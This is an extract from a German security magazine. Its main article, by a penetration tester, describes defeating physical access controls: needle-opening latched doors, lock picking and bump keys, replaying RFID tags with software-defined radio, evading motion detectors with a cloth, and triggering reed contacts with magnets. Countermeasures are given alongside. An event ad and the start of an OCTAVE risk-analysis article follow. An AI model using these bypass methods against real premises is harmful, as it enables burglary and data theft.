des Netzwerkes seine physikalische Sicherheit. Die 

Bedrohung kommt nicht nur durch das Ethernet-Kabel. 


�� 

werden können 

�� 

Im Jahr 2010 ist es kein Problem mehr, ein Netzwerk 

vor Gefahren zu schützen. Firewall-Hardware gibt es 

mittlerweile zu erschwinglichen Preisen. IT-Systemhäuser 

holen sich Sicherheitsexperten und richten mit 

deren Unterstützung ein sicheres Netzwerk ein. Mitarbeiter 

werden im Umgang mit der IT-Technik geschult, 

sodass Phishing und Social Engineering Angriffe erfolglos 

verlaufen. IDS und IPS Systeme finden verdächtige 

Aktivitäten im Netzwerk und zeigen diese dem Administrator 

an. Die IEEE 802.1X Authentifizierung an Access 

Points und Netzwerkswitches verhindern den Zugang 

von unbekannten Computern zum Netzwerk. Mit IEEE 

802.1Q (Virtual Local Area Network oder kurz VLAN) 

werden Netzwerke segmentiert, obwohl alle Computer 

hardwareseitig an einem Switch hängen. Mit diesen 

Techniken ist man in der Lage ein Netzwerk sowohl vor 

Angriffen aus dem WAN als auch aus dem Inneren LAN 

zu schützen – würde man meinen. 

Die Realität 

Ich wurde von einem mittelständischen Unternehmen 

engagiert einen Penetrationstest durchzuführen. Während 

der Footprinting-Phase habe ich sehr schnell erkannt, 

dass die IT-Sicherheit bei diesem Unternehmen 

ein sehr sensibles Thema ist. Doch trotz fast paranoider 

Sicherheitsvorkehrungen, ist es mir erfolgreich gelungen, 

dem Unternehmen die Kundendaten zu entwenden. 

Zwar war IT-Technisch alles abgesichert, der physische 

Zugang zu den Daten war es allerdings nicht. 

Die Eingangstür des Unternehmens war wegen des 


�� 

Kundenverkehrs nicht abgeschlossen. Die Tür zum 

Serverraum stand wohl wegen der Abwärme sperrangelweit 

offen, im Schloss des Racks steckte der Schlüssel. 

Es gab nichts und niemanden, der mich davor abhalten 

konnte, aus jedem Server jeweils eine Festplatte 

einzustecken und blitzschnell das Gelände zu verlassen. 

Weder der Geschäftsführer noch die IT-Administration 

hat mit einem so dreisten und einfachen Angriff 

gerechnet. 

In dem folgenden Artikel werde ich die aktuelle Sicherheitstechnik 

vorstellen und aufzeigen, wie einfach 

diese Technik zerstörungsfrei mit und fast spurlos 

überlistet werden kann. Dieser Artikel ist keine Anleitung, 

wie man einbricht, er soll lediglich die Schwachstellen 

der heute massenhaft eingesetzten Systeme 

aufzeigen. Aus diesem Grund habe ich mich bei den 

Beschreibungen kurz gefasst sowie einige Details 

weggelassen. 

Zugefallene Türen 

Was ist eigentlich eine zugefallene Tür? Rund 95% aller 

Türen haben heute ein Schloss mit einer Falle. Wird 

die Tür zugezogen, fällt die Schlossfalle in die dafür 

vorgesehene Öffnung des Schließbleches in der Türzarge. 

Die Tür lässt sich dann entweder mit dem Türgriff 

oder durch das drehen des Schließzylinders wieder 

öffnen (wenn z.B. auf einer Seite ein Knauf statt eines 

Angriffes angebracht ist). Mit dem Schlüssel reicht eine 

halbe Umdrehung aus, um die Tür wieder zu öffnen. 

Bei elektronischen Schließsystemen erfolgt die Freiga- 

hakin9.org/de 17

18 

be dabei nicht an der Schlossfalle freigegeben, sondern 

am Schließblech. 

Wie lässt sich eine zugefallene Tür öffnen? 

Zugefallene Türen lassen sich ganz einfach öffnen. Schlüsseldienste 

verwenden hierfür Öffnungsnadeln. (Abbildung 

1.) Diese Öffnungsnadeln werden in Höhe der Schlossfalle 

zwischen Türzarge und Türblatt angesetzt, zieht man jetzt 

den hinteren Teil der Öffnungsnadel nach oben, drückt der 

vordere Teil die Schließfalle wieder ins Schloss zurück – die 

Tür ist damit offen. Mit etwas Übung dauert es nicht länger 

als fünf Sekunden, um eine Tür zu öffnen. 

Abbildung 1. Zwei Sätze Öffnungsnadeln 

Abbildung 2. Eine Öffnungsnadel an einer Doppelfalztür 

PRAXIS 

Um so etwas zu verhindern, bieten sich sogenannte 

Doppelfalztüren an. (Abbildung 2.) Diese Türen haben 

einen zweiten Knick im Rahmen und Türblatt. Eine angesetzte 

Öffnungsnadel kommt damit nicht mehr an die 

Schließfalle ran und eine Öffnung wird damit verhindert. 

Mit einer sogenannten „Mach Auf“ Faltkarte lässt sich 

aber auch dieses Hindernis überwinden. 

Damit eine Tür mit diesen Techniken nicht geöffnet 

werden kann, hilft es nur diese Tür abzuschließen. 

Dabei wird mindestens ein Riegel in das Schließblech 

geschoben, der ohne Schlüssel nicht mehr zurückgeschoben 

werden kann. Das Abschließen einer Tür mit 

Schlüssel ist jedoch nicht komfortabel. Diese Schwäche 

haben die Schlosshersteller erkannt und bieten 

selbstschließende Schlösser an. Diese Schlösser 

schieben automatisch beim zufallen die Riegel 

in das Schließblech. Betätigt man die Türklinke, wird 

gleichzeitig die Schlossfalle und die Riegel zurückgeschoben, 

die Tür ist wieder offen. Je nach Modell des 

Schlosses braucht man aber weiterhin eine bis zwei 

Umdrehungen mit dem Schlüssel, um diese Tür zu öffnen. 

Diese Schlösser sind allerdings nicht für Türen geeignet, 

die über eine Elektronik geöffnet werden sollen. 

Hierfür gibt es allerdings auch eine Lösung. Es 

gibt Schlösser mit einer Elektronik und einem Elektromotor, 

der dann bei einem entsprechenden Signal 

das Schloss aufschließt und damit die Funktion eines 

Schlüssels simuliert. Allerdings sind solche Schlösser 

recht teuer. 

Lockpicking – Der Zylinder als Angriffsziel 

Eine weitere Schwachstelle einer Tür ist der Zylinder. 

Ein Laie kann nicht erkennen, ob die Mechanik eines 

Zylinders sicher ist oder mit entsprechendem Werkzeug 

sekundenschnell überlistet werden kann. Für ihn zählt 

lediglich der Preis und die Logos auf der Verpackung, 

um die Sicherheit beurteilen zu können. Hier gilt allerdings 

ausnahmsweise der Grundsatz: billig = schlecht, 

teuer = gut, wobei man dazu anmerken muss, dass 

man die oberste Preiskategorie der Zylinder wählen 

muss, um tatsächlich eine hohe Sicherheitsstufe herstellen 

zu können. Dass man Zylinder öffnen kann, liegt 

an der (Massen-)Herstellung dieser mechanischen Geräte. 

Jedes Produkt weist gewisse Toleranzen auf, je 

größer diese Toleranzen sind, desto leichter lässt sich 

der Zylinder überlisten. 

Wie Funktioniert ein Schließzylinder? 

Ein Schließzylinder besteht aus einem Gehäuse (hellgrau) 

und einem Kern (dunkelgrau). Kernstifte (gelb) 

und Gehäusestifte (rot) verhindern, dass der Kern gedreht 

werden kann. Führt man nun einen Schlüssel in 

den Schließkanal (weiß) ein, drücken die Zähne des 

Schlüssels die Kernstifte herunter sodass der Übergang 

zwischen den Kernstiften und den Gehäusestif- 

10/2010

ten genau zwischen dem Kern und dem Gehäuse ist. 

In diesem Zustand lässt sich der Kern drehen und ein 

Schloss aufschließen. 

Ich möchte hier drei Methoden vorstellen, mit denen 

ein Schließzylinder ohne Schlüssel zerstörungsfrei geöffnet 

werden kann. Beim klassischen Handpicken geht 

es darum, die Sperrstifte eines Schlosses so zu manipulieren, 

dass diese den Kern freigeben. Zunächst wird 

ein Spanner in den Schließkanal eingeführt und um ein 

paar Grad gedreht, sodass ein minimaler Drehmoment 

auf die Sperrstifte wirkt. Geht man jetzt mit einem Handpick 

die einzelnen Sperrstifte ab, so lässt sich mit etwas 

Übung erfühlen, welcher Stift gerade am meisten Widerstand 

bietet. Drückt man diesen Stift mit dem Handpick 

herunter, lässt sich der Kern ein kleines bisschen 

drehen, sobald der der Gehäusestift den Kern verlassen 

hat. Diesen Stift hat man jetzt gesetzt. Nun sperrt 

ein anderer Sperrstift. In einem normalen Schloss gibt 

es etwa fünf solcher Stifte. Hat man alle Stifte richtig 

gesetzt, lässt sich der Kern drehen ist der Zylinder ist 

damit geöffnet. 

Eine weitere Methode um einen Schließzylinder zu 

öffnen sind Schlagschlüssel. Ein Schlagschlüssel ist 

ein spezieller aus Stahl gefertigter Schlüssel, der nur im 

Profil in einen Zylinder passt. Die Zähne des Schlüssels 

wurden auf die tiefst mögliche Position gefräst, außerdem 

wurde der Anschlag des Schlüssels um etwa einen 

Millimeter verkürzt, sodass der Schlüssel sich mit 

leichtem Druck etwas tiefer ins Schloss einführen lässt 

als vorgesehen. Zum Öffnen des Zylinders führt man 

den Schlagschlüssel in den Zylinder ein und schlägt anschließend 

mit einem flexiblen Hammer auf den Schlüssel. 

Den Schlagimpuls übertragen die Kernstifte auf die 

Gehäusestifte, die dann nach unten gedrängt werden 

und damit den Kern freigeben. Dreht man den Schlagschlüssel 

genau in diesem Moment (wenige Millisekunden 

nach dem Schlag), lässt sich der Kern drehen und 

das Schloss öffnen. 

Die dritte Methode ist ein Elektro-Pick. Ein Elektropick 

arbeitet nach dem gleichen Prinzip, wie ein 

Schlagschlüssel, nur dass hier mehrere Schläge pro 

Sekunde auf die Sperrstifte erfolgen. Um einen Zylinder 

mit dieser Methode zu öffnen, führt man die Nadel 

des Elektro-Picks sowie einen Spanner (entweder 

einen normalen oder einen Drehspanner) in den 

Schließkanal ein und schaltet den Pick ein. Anstatt 

den Pick durchgehend laufen zu lassen, empfiehlt es 

sich ihn in kurzen Sequenzen ein- und auszuschalten. 

Sind die Sperrstifte in passender Position, lässt sich 

der Kern drehen. 

Bei allen drei vorgestellten Öffnungsmethoden hat 

man bei abgeschlossenen Schlössern immer ein Problem. 

Hat man einen Zylinder um 360° gedreht, drücken 

die Federn die Gehäusestifte wieder in den Kern 

und man müsste den Zylinder erneut öffnen (picken). 

Um das zu verhindern – und damit stelle ich das letz- 


te Werkzeug meiner Sammlung vor – benutzt man das 

„Flip-It“ Werkzeug. Dieses Werkzeug nutzt die physikalische 

Trägheit aus, indem der Zylinder so schnell dreht 

wird, dass die Federn es nicht schaffen, die Stifte in den 

Kern zu drücken. Dazu spannt man den „Flip-It“ erst 

einmal in der Richtung vor, in der der Zylinder gedreht 

werden soll, dann führt man es in den Schließkanal ein 

und drückt den Auslöser. Der Zylinder wird dann über 

die oberste Position gedreht und man kann das Schloss 

weiter öffnen. 

Man benötigt viel Übung, um einen Zylinder ohne 

Schlüssel öffnen zu können. Denn macht man es mit 

Gewalt, kann die Mechanik im inneren beschädigt werden. 

Dann lässt sich das Schloss nicht einmal mit dem 

richtigen Schlüssel öffnen. 

Sichere Schließzylinder 

Sichere Schließzylinder gibt es in meinen Augen nicht. 

Je nachdem welchen Aufwand und Kosten man auf sich 

nimmt, wird man in der Lage sein, alle Zylinder zu umgehen. 

Einen aus meiner Sicht relativ sicheren Zylinder 

bietet die Firma EVVA mit dem MCS (Magnet Code 

System) an. Statt normaler Stifte arbeitet dieser Zylinder 

mit insgesamt acht Magnetrotoren. Wird ein Schlüs- 

Abbildung 3. Ein Schließzylinder im Querschnitt. Links ist der 

Zylinder abgeschlossen, rechts offen (Bildquelle: Wikipedia.de) 

Abbildung 4. Werkzeugsatz zur zerstörungsfreien Öffnung von 

Schlössern 

hakin9.org/de 19

20 

Abbildung 5. Ein EVVA-MCS Schlüssel 

Abbildung 6. Ein Elektronisches Codeschloss an einer 

Gegensprechanlage 

PRAXIS 

sel mit richtiger Magnet-Codierung eingeführt, werden 

die Rotoren in die Schließposition gebracht und der 

Zylinder lässt sich drehen. Zusätzlich kann ein solcher 

Zylinder mit einer Elektronik auf RFID Basis ausgestattet 

werden. Zusätzlich zum Magnetcode wird noch eine 

elektronische Authentifizierung durchgeführt, bevor 

dieser Zylinder trotz des richtigen Schlüssels gedreht 

werden kann. So können z.B. verlorene Schlüssel gesperrt 

werden oder um Mitarbeitern den Zutritt nur zu 

bestimmten Zeiten zu gestatten. 

Codeschlösser 

Codeschlösser sind in der Regel zugefallene Türen und 

lassen sich am einfachsten mit den bereits oben vorgestellten 

Methoden öffnen. In diesem Artikel möchte 

ich aber auf eine weitere Schwachstelle hinweisen. Die 

Abbildung 5. zeigt ein typisches Codeschloss, anhand 

des Zylinders auf der rechten Seite kann jeder darauf 

schließen, wie groß die Code-Tasten dieses Schlosses 

in der Realität sind. Würde man eine Codeeingabe filmen, 

könnte man anhand der langen Handbewegungen 

auf den Code schließen können. 

Diese Schwachstelle lässt sich aber ganz einfach 

schließen, indem man den Eingabetasten die Ziffern für 

jede Codeeingabe per Zufallsgenerator zuweist. Das 

bedeutet, dass die obere linke Taste nicht permanent 

die Ziffer 1 eingibt, sondern bei jeder Codeeingabe eine 

andere. Durch diese zufällige Anordnung der Ziffern 

auf den Tasten lässt sich nicht mehr anhand der 

Handbewegung feststellen, welche Ziffer eingegeben 

wurde. Umsätzen lässt sich eine solche Eingabetechnik 

mit Siebensegmentanzeigen oder mini-OLED-Bildschirmen 

unter durchsichtigen Tasten bzw. mit einem 

Touchscreen. 

In Indoor-Bereich trifft man vor einigen Räumen auf 

eine einfachere Version von Codeschlössern. Bei diesen 

Schlössern liegt das Eingabeterminal direkt am 

Schloss an, die Energieversorgung erfolgt über Batterien. 

Im geschlossenen Zustand lässt sich die Türklinke 

ohne Funktion herunterdrücken. Gibt man den 

richtigen Code ein, wird ein Elektromagnet mit Strom 

versorgt und Zieht einen Stift an, der die Türklinke mit 

dem Schloss verbunden. Betätigt man jetzt die Türklinke, 

so lässt sich die Tür öffnen. Da die Batterien in einem 

solchen Schloss möglichst lange halten sollen, 

arbeiten die Schlösser mit einem recht geringen Magnetfeld. 

Dieses Magnetfeld kann man jedoch mit einem 

von außen angebrachten starken Magneten (siehe 

auch Abschnitt über Reed-Relais) simulieren und so 

das Schloss öffnen. Im Übrigen lassen sich mit einem 

starken Magneten auch einige ältere elektronische Zylinder 

öffnen. 

Schließsysteme mit RFID-Tags 

RFID steht für radio frequency identification, also 

für die Identifikation über Funkwellen. Diese Technik 

10/2010

ist heute sowohl bei Unternehmen, als auch in Privathäusern 

(Autoschlüssel, Funk-Garagentoröffner) 

sehr verbreitet und wegen des Komforts beliebt. Im 

Wesentlichen besteht das System aus zwei Komponenten, 

einem RFID Lesegerät und den sogenannten 

Tags. Mit den Tags können sich die Zugangsberechtigten 

Personen am Lesegerät identifizieren. Unabhängig 

davon, ob das Tag aktiv (mit einer eigenen 

Energieversorgung) oder passiv (die notwendige 

Energie liefert das Lesegerät) ist, wird der Identifikationsvorgang 

vom Tag eingeleitet. In den einfachsten 

Fällen sendet das Tag unverschlüsselt die eigene 

Seriennummer oder einen vorher eingespeicherten 

Code, das Lesegerät empfängt den Code und 

überprüft ob die Seriennummer oder der Code zugangsberechtigt 

ist. In den wenigsten Fällen erfolgt 

eine zusätzliche Kryptographische Authentifizierung 

des Tags, die aber wegen der geringen Rechenkapazität 

und Energieversorgung sehr einfach ausfällt. 

Wie kann man solche Systeme überlisten? 

Das Zauberwort dazu lautet „Software Defined Radio“ 

(SDR). Mit einem SDR Tranceiver ist man in der 

Lage, die Kommunikation zwischen dem Tag und 

dem Lesegerät aufzuzeichnen und auf einem Rechner 

zu analysieren. Anschließend sendet man die 

aufgezeichneten und eventuell bearbeiteten Daten 

an das Lesegerät. 

Wie läuft ein solcher Angriff ab? 

Zunächst einmal muss man herausfinden, auf welcher 

Frequenz die Kommunikation zwischen dem Lesegerät 

und den Tags erfolgt. Dazu kann man über 

den Herstellernamen des Lesegerätes und seinem 

Produkt-Portfolio gehen oder einfach verschiedene 

Tags ausprobieren. Wenn ein Tag mit dem eingesetzten 

Lesegerät nicht kompatibel ist, erfolgt keine 

Reaktion. Wird dem Tag der Zugang verweigert, so 

zeigt das Lesegerät dies in der Regel an. Dann wird 

ein SRD Tranceiver benötigt, der auf der benötigten 

Frequenz arbeitet. Dazu verwende ich den USRP/ 

USRP2 Tranceiver mit einem passenden Daughterboard 

und einer Richtantenne (700$/1.400$ + 275$ 

+ 100$). Der Vorteil dieses Universalsystems liegt 

daran, dass man mit verschiedenen Daughterboard 

unterschiedliche Frequenzen abdecken kann. Die 

Richtantenne richtet man dann etwas seitlich auf das 

Lesegerät aus und fängt mit der Aufzeichnung der 

Daten in dem Frequenzbereich an. Bei Long Range 

Tags (das Tag kann mehrere Meter vom Lesegerät 

entfernt sein) reicht bei Unverschlüsselten Systemen 

- wegen der höheren Sendestärke - die Aufzeichnung 

einer Kommunikation aus. Passive Tags, wie RFID 

Karten, senden ein viel schwächeres Signal, deshalb 

sind die Aufzeichnungen oft gestört. In der Regel benötigt 

man fünf bis zehn Aufzeichnungen um ein Mus- 


Abbildung 7. Das Lesegerät reagiert auf eine Mifare-Classic Karte 

und lehnt den Zugang ab 

Abbildung 8. Eine Überwachungskamera hat eine Veränderung 

im Bild detektiert. Der veränderte Bildausschnitt wird in einem 

Rahmen angezeigt. 

hakin9.org/de 21

22 

ter zu finden. Der Anfang der Übertragung ist immer 

gleich, in der Mitte gibt es einen variablen Bereich 

und das Ende ist bei allen Aufzeichnungen ebenfalls 

gleich. Damit ein Lesegerät nun dem virtuellen Tag 

den Zugang gewährt, säubert man zunächst einmal 

die Aufzeichnungen mit einigen Filtern. GNU-Radio 

bietet hierfür zahlreiche Möglichkeiten. Dann stellt 

man sich aus mehreren Aufzeichnungen ca. drei 

möglichst ideale (hier braucht man etwas Erfahrung, 

ein gutes Auge und etwas Fingerspitzengefühl) Kommunikationen 

zusammen und sendet diese an das 

Lesegerät. Mindestens eine dieser Aufzeichnungen 

wird dann das Lesegerät akzeptieren und dem Angreifer 

den Zugang gewähren. 

Aus der Praxis kann ich sagen, dass etwa 90% aller 

RFID-Karten-Systeme sich nur mit der Seriennummer 

des Tags zufrieden geben. Ältere Garagentoröffner 

arbeiten mit einem statischen Code. Neuere 

Garagentoröffner und einige Autohersteller nutzen einen 

Rolling Code, um den Nutzer zu identifizieren. Im 

März 2008 wurde auch dieses System von Forschern 

der Ruhr-Universität Bochum geknackt. Zwei aufgezeichnete 

Kommunikationen genügen bereits für eine 

Seitenkanalattacke. Ebenfalls wurde im Jahr 2008 

die Verschlüsselung des Mifare-Systems per Reverse 

Engineering geknackt. Solche Verschlüsslungen 

verlangsamen nur den Angriff und machen ihn teurer. 

Gibt es auch sichere RFID-Systeme? 

Die gibt es durchaus. Hier verwendet man eine 

asymmetrische Verschlüsselung. Für jedes zugangs- 

Magnete sind kein Spielzeug 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

Abbildung 9. Eine Büroklammer ist an einer Schnurr befestigt. 

Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so 

stark, dass die Büroklammer in der Luft hängt. 

PRAXIS 

berechtigte Tag wird ein privater und ein öffentlicher 

Schlüssel erzeugt. Der private Schlüssel wird in einer 

Datenbank gespeichert, auf die das Lesegerät zugreifen 

kann. Der öffentliche Schlüssel wird auf dem 

Tag gespeichert. Die Identifizierung erfolgt dann in 

mehreren Schritten. Wie oben bereits beschrieben, 

fängt das Tag mit der Identifikation an, indem es dem 

Lesegerät seine Seriennummer mitteilt. Das Lesegerät 

generiert daraufhin eine Zufallszahl und sendet 

diese mit der Seriennummer des Tags wieder zurück. 

(Da die Kommunikation über Funk erfolgt, kann es 

sein, dass zur gleichen Zeit mehrere RFID Tags aktiv 

sind. Deshalb muss man während der Kommunikation 

stets angeben, für welchen Empfänger eine Nachricht 

bestimmt ist.) Das Tag empfängt die Nachricht, 

verschlüsselt diese mit dem öffentlichen Schlüssel 

und sendet sie an das Lesegerät zurück. Kann das 

Lesegerät die empfangene Nachricht mit dem privaten 

Schlüssel des Tags entschlüsseln und stimmt die 

Nachricht mit der Zufallszahl überein, wird der Zugang 

gewährt. 

Bewegungsmelder 

Bewegungsmelder verwenden für die Bewegungsdetektion 

Passiv Infrarot Sensoren (PIR). Jedes Objekt 

emittiert eine Wärmestrahlung, ein PIR Sensor kann 

diese Strahlung messen. Um Bewegungen detektieren 

zu können, wird der Sensor mit Bündellinsen in Bereiche 

aufgeteilt. Ändert sich die einfallende Strahlung 

in einem Bereich um einen bestimmten Schwellwert, 

wird dies als Bewegung interpretiert. Der Schwellwert 

sorgt außerdem dafür, dass statische Temperaturveränderungen 

der Umgebung nicht als Bewegung gedeutet 

werden. Diese Funktionsweise ist leider Fehleranfällig, 

so kann z.B. ein kalter Luftstrom bereits einen 

Bewegungsmelder auslösen. Hierfür setzen bessere 

Bewegungsmelder (Dualmelder) zusätzlich noch einen 

Ultraschall-Sensor ein. Nur wenn beide Sensoren 

auslösen, wird eine Bewegung gemeldet. Damit sollen 

Fehlalarme verhindert werden. VdS-Anerkannte 

Bewegungsmelder, die in Alarmanlagen verwendet 

werden, lösen zusätzlich Alarm aus, wenn diese abgedeckt 

werden. 

Wie kann man Bewegungsmelder überlisten? 

Je größer die Entfernung zu dem PIR Sensor ist, desto 

weniger nimmt eine Veränderung Einfluss auf die 

einfallende Infrarotstrahlung in einem Bereich. Auch 

haben Gegenstände mit gleicher Wärmestrahlung keinen 

Einfluss auf die Sensoren. Einen Bewegungsmelder 

(auch einen Dualmelder) kann man deshalb mit einem 

Tuch überlisten. Zunächst lässt man das Tuch im 

überwachten Raum einige Minuten liegen, damit es die 

Temperatur der Umgebung annimmt. Wenn man sich 

jetzt in dieses Tuch einhüllt und seitwärts mit dem Rücken 

zum Bewegungsmelder langsam an diesem vor- 

10/2010

eigeht, wird keine Bewegung angezeigt. Zwar merkt 

bei einem Dualmelder der Ultraschall-Sensor die Bewegung, 

da jedoch der Infrarot Sensor keine Bewegung 

meldet, findet keine Alarmierung statt. Würde 

man dieses Tuch etwa 30cm vor dem Bewegungsmelder 

aufspannen, würde man den Bewegungsmelder 

außer Funktion setzen. Auch eine Abdeckerkennung 

würde hier nicht auslösen, da diese in der Regel bis 

20cm funktioniert. 

Gibt es Alternativen? 

Sicherlich gibt es sie. Zunächst einmal gibt es Bewegungsmelder, 

die auf Basis von Radarstrahlung funktionieren. 

Diese aktiven Bewegungsmelder können 

verdeckt z.B. unter einer Tapete oder Abdeckplatte installiert 

werden. Dadurch ist ein solcher Bewegungsmeder 

sowohl optisch nicht wahrnehmbar als auch 

vor Sabotage und Vandalismus geschützt. Ein solcher 

Bewegungsmelder arbeitet nach dem Dopplerprinzip 

und strahlt im 9GHz oder 24GHz-Mikrowellenbereich. 

Zwar halten sich die Hersteller solcher Geräte an die 

gesetzlichen Bestimmungen, ich würde allerdings immer 

auf eine zusätzliche Strahlenquelle verzichten, wo 

es geht. 

Eine weitere Alternative zu Bewegungsmeldern sind 

Kameras. Zwar halte ich persönlich nichts von Überwachung 

und ständiger Videoaufzeichnung, doch 

Kameras sind sehr gute Bewegungsmelder. Im Gegensatz 

zu den klassischen PIR, Ultraschall oder Radarbewegungsmeldern 

gibt es bei Kameras zahlreiche 

Bildpunkte, die ausgewertet werden können. Mit 

entsprechender Software kann man detektierte Bewegungen 

analysieren und z.B. mit einer Objekterkennung 

interpretieren. Verdächtige Bilder lassen sich an 

ein Sicherheitsunternehmen in Echtzeit übertragen, 

wo ein Mensch beurteilt, ob ein Alarm ausgelöst werden 

muss oder nicht. 

Reed-Relais 

Reed-Relais werden heute verwendet, um z.B. Tür- 

oder Fensteröffnungen zu detektieren. Ein Reed-Relais 

besteht einem Reed-Kontakt und einem Magneten. 

Der Reed-Kontakt wird am Rahmen befestigt und 

ist an die Einbruchmeldezentrale angeschlossen. Der 

Im Internet 

�� http://de.wikipedia.org/wiki/Lockpicking – Wikipedia Eintrag 

zum Thema Lockpicking 

�� http://www.evva.de�� 

zylindern 

�� http://de.wikipedia.org/wiki/Reed-Relais – Wikipedia Eintrag 

zum Reed-Relais 

�� http://www.elv.de – Artikel-Nr. 68-835-10 – Radar Bewegungsmelder 

�� http://www.ettus.com/�� 


Magnet wird auf dem beweglichen Element in Höhe 

des Kontaktes befestigt. Wirkt ein Magnetfeld auf den 

Reed-Kontakt, ziehen sich die Schaltkontakte gegenseitig 

an und ein Stromkreis wird geschlossen. Lässt 

das Magnetfeld nach, wenn z.B. eine Tür geöffnet wird 

und sich der Magnet dem Reed-Kontakt entfernt, wird 

der Stromkreis geöffnet. In diesem Fall wird dann der 

Alarm ausgelöst. 

Wie lassen sich Reed-Relais überlisten? 

Das ist vergleichbar einfach. Die Antwort auf diese Frage 

lautet natürlich: mit einem Magnetfeld. Hierfür eignen 

sich sogenannte „Todesmagneten“ (Abbildung 9.). 

Diese Permanentmagneten haben ein extrem starkes 

Magnetfeld. Unter Laborbedingungen hat ein Reed- 

Kontant bereits bei einer Entfernung von 40cm zum 

Magneten seine Schaltkontakte geschlossen. Holz-, 

Plastik- oder sogar Metall-Türen (sogar 2mm Stahl) 

bieten keine ausreichende Dämpfung für das Magnetfeld. 

Eine bessere Alternative zu Reed-Relais sind Licht- 

oder Laserschranken. Diese Schranken bringt man so 

an, dass die Tür den Strahl beim öffnen unterbrechen 

muss. 

Ziele eines solchen Angriffes 

Es sind viele Angriffsziele denkbar. Es kommt immer 

auf das Unternehmen an, dass angegriffen wird. Vor 

einigen Monaten berichtete die Presse über einen solchen 

Angriff auf einen Baumarkt. Kriminelle Einbrecher 

haben hier statt waren zu stehlen, die Elektronik 

der Karten-Terminals an den Kassen sabotiert, sodass 

diese die eingelesenen Daten von EC- und Kreditkarten 

samt der vom Kunden eingegebenen PIN per Funk 

übermittelt wurden. Auf dem Parkplatz des Baumarktes 

stand dann der Angreifer und hat die Daten empfangen. 

Ein anderes Angriffsziel könnte der Anschluss eines 

Mini-Computers am Netzwerk sein, der ein Loch durch 

die Firewall bohrt und dem Angreifer einen permanenten 

Zugriff auf das Netzwerk über das Internet gestattet. 

Auch ist die Installation eines Hardware-Keylogers 

denkbar, um die Zugangsdaten eines Mitarbeiters auszuspionieren. 

DIMITRI ROSCHKOWSKI 

Der Autor arbeitet bereits seit vielen Jahren als selbstständiger 

IT-Sicherheitsexperte und Consultant. Er führt außerdem 

bei Unternehmen Penetration Tests durch. 

Kontakt mit dem Autor: dimitri@roschkowski.biz 

hakin9.org/de 23

12-11-2010 

Die IT-Security Community Xchange ist DIE Weiterbildungsnacht für 

SystemadministratorInnen, Lehrbeauftragte, StudentInnen, Schüler- 

Innen, ExpertInnen und Geeks 

Themen: 

� Biometrie 

� Penetration Testing 

� Hackz und Crackz 

� Privacy 

� Forensische Analyse 

� Intrusion Prevention, Malwarededection 

� Rootkits und deren Erkennung 

Jetzt noch schnell 

anmelden unter: 

http://itsecx.fhstp.ac.at 

Die Teilnahme ist kostenlos! 

Freitag, 12. November 2010, 17 – 24 Uhr 

Fachhochschule St. Pölten 

Matthias Corvinus-Straße 15, 3100 St. Pölten 

T: +43/2742/313 228, E: office@fhstp.ac.at 

I: www.fhstp.ac.at

Um dies zielorientiert und auf die vorhandenen 

Business Needs maßzuschneidern sind Risikoerkennung 

(Risikoanalyse) und deren anschließende 

Bewertung (Business Impact Analyse) die ersten 

Schritte, die gemacht werden müssen. 

Eine effektive Informations-Sicherheitsbewertung betrachtet 

nicht nur den technologischen sondern auch 

den dahinter liegenden organisatorischen Aspekt. Beispielsweise 

die Handhabung der IT-Infrastruktur durch 

die MitarbeiterInnen bei ihrer täglichen Arbeit. Durch ei- 

OCTAVE 

OCTAVE –Hier macht 

das Risiko die Musik 

Helmut Kaufmann 

Die überwiegende Mehrheit von Unternehmen sind nach regulativen 

Vorgaben wie z.B. Basel II, Solvency II, SOX, 8. EU Auditrichtlinie 

oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares 

Risikomanagement und Business Continuity Planning zu 

implementieren. 


�� 

�� 

ren. 

Abbildung 1. Risikomanagementzyklus 


�� 

men und Standards. 

ne Risikoanalyse erhält man einen organisationsweiten 

Überblick über vorhandene Risiken und ist somit integraler 

Bestandteil des Risikomanagements (vergl. Abb. 

1). 

OCTAVE ist eine risikobasierende, strategische Sicherheitsbewertungs 

und -planungstechnik. 

OCTAVE® ist ein Kunstwort und setzt sich aus den 

Begriffen: Operationally Critical Threat, Asset, and Vulnerability 

Evaluation zusammen. Sie wurde von der 

Carnegie Mellon University, welche auch die populäre 

Abbildung 2. CIA 

hakin9.org/de 25

26 

Web-Site www.cert.org betreibt, passend für die unterschiedlichsten 

Unternehmensgrößen, als lizenzfreie 

Risikoanalyse Methode entwickelt. 

OCTAVE ist eine selbstgesteuerte Methode. Das bedeutet, 

dass die MitarbeiterInnen einer Organisation 

eine wesentliche Rolle bei der Erstellung der Sicherheitsstrategie 

übernehmen. Risiken von hoch kritisch 

erkannten Assets, werden dazu verwendet um eine 

entsprechende Priorisierung der Sicherheitsbereiche 

durchzuführen. 

Im Gegensatz zu typischen technologielastigen Bewertungsmethoden, 

die technologische Risiken und 

taktische Sachverhalte in den Mittelpunkt der Betrachtung 

stellen, ist OCTAVE auf organisatorische Risiken 

und deren dazu notwendigen Technologieeinsatz ausgerichtet. 

Sie ist eine äußerst flexible Methode, die für 

fast alle Organisationen speziell angepasst werden 

kann. Aus der Sichtweise des Autors ist einer der bemerkenswertesten 

Vorteile jedoch, dass die Methode 

von den MitarbeiterInnen selbst schnell erlernt und kontinuierlich 

durchgeführt werden kann und somit nachhaltig 

in den Risikomanagementprozess ohne weitere 

Kosten integrierbar ist. 

Ein ausgewähltes kleines Team aus allen operationellen 

Bereichen der Organisation inklusive der IT Abteilung 

arbeiten zusammen um die Sicherheitsbedürfnisse 

der Organisation zu identifizieren und versuchen 

die Gebiete: Operationelles Risiko, eingesetzte Sicher- 

Abbildung 3. Octave Phasen 

ABWEHR 

heitspraxis und Technologie ins Gleichgewicht zu setzten. 

Getrieben von zwei Grundaspekten – operationelles 

Risiko und aktuell eingesetzte Sicherheitspraktiken, 

wird die dahinter liegende Technologie in Zusammenhang 

mit der Sicherheitspraxis gegen die drei Eckpfeiler 

der Sicherheit geprüft (vergl. Abb 2.) 

OCTAVE ist ein wertegetriebener Bewertungsansatz. 

Das Analysis Team 

�� 

die Organisation wichtig sind. 

�� 

diejenigen Werte, die als besonders kritisch beurteilt 

werden Berücksichtigt die Zusammenhänge 

zwischen den kritischen Assets, den Bedrohungen 

und den Verwundbarkeiten 

�� 

menhang 

�� 

(organisatorisch und auch einen Plan zur Reduzierung 

der Risiken auf kritische Infrastrukturen) 

Daraus resultiert ein dreiphasiges Vorgehensmodell 

